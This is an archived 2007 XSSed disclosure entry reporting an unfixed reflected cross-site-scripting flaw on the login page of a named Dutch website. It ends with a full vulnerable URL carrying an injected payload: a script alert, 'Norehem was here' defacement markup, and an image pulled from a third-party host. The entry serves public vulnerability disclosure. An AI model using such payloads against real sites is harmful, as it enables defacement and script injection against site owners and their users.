Lucene search

K
xssedNorehemXSSED:13180
HistoryJul 31, 2007 - 12:00 a.m.

Unfixed XSS vulnerability at www.instalofferte.nl

2007-07-3100:00:00
Norehem
www.xssed.com
8

Security researcher Norehem, has submitted on 31/07/2007 a cross-site-scripting (XSS) vulnerability affecting www.instalofferte.nl, which at the time of submission ranked 7206113 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.instalofferte.nl/installatieweb/inloggen.asp?msg=<SCRIPT>alert(β€˜Norehem WaS HeRe!!’)</SCRIPT><H1><H1><H1><marquee>Norehem was here</marquee></H1></H1></H1><CENTER><IMG SRC=β€œhttp://www.cibernautica.com/forocibernautica/upload/norehemzu4.gif”></CENTER>